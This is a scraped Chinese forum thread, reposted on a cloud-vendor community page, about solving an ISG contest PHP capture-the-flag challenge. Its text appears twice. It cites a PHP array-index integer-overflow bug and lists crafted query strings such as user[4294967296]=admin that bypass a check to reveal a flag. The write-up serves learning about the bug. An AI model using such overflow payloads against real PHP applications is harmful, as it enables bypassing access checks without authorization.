hack - PHP的資訊安全(入侵擷取$flag)的題目【Q2】

來源:互聯網
上載者:User

地址:http://202.120.7.134:8888/html/array.php

參加ISG(資訊安全大賽)發現的一道題目。
作為一名PHPer,喵的我真心感覺這代碼無解啊。。。
求大神解惑,如何給一個user參數,擷取到$flag。。。

Update at 2015/20/22
總算通過"邀請回答"找到大神了~
漏洞在於PHP的數組下標的一個BUG,可以利用【整型溢出】……
可以參照這裡:
https://bugs.php.net/bug.php?id=69892

我覺得這種利用BUG出題的,簡直是……

比賽時間已過,果斷自己寫了下代碼:

測試效果:

測試地址:
http://moonlordapi.sinaapp.com/1.php

補充,參數可以有好幾種方式:
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[4294967297]=1445502008
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[]=1445502008
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[1]=1445502008

就此愉快地結題了。

回複內容:

地址:http://202.120.7.134:8888/html/array.php

參加ISG(資訊安全大賽)發現的一道題目。
作為一名PHPer,喵的我真心感覺這代碼無解啊。。。
求大神解惑,如何給一個user參數,擷取到$flag。。。

Update at 2015/20/22
總算通過"邀請回答"找到大神了~
漏洞在於PHP的數組下標的一個BUG,可以利用【整型溢出】……
可以參照這裡:
https://bugs.php.net/bug.php?id=69892

我覺得這種利用BUG出題的,簡直是……

比賽時間已過,果斷自己寫了下代碼:

測試效果:

測試地址:
http://moonlordapi.sinaapp.com/1.php

補充,參數可以有好幾種方式:
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[4294967297]=1445502008
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[]=1445502008
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[1]=1445502008

就此愉快地結題了。

請教了我安全的大神同學 他說0可以通過整型溢出得到 繞過if判斷

樓上正解。。。。

  • 相關文章

    聯繫我們

    該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

    如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.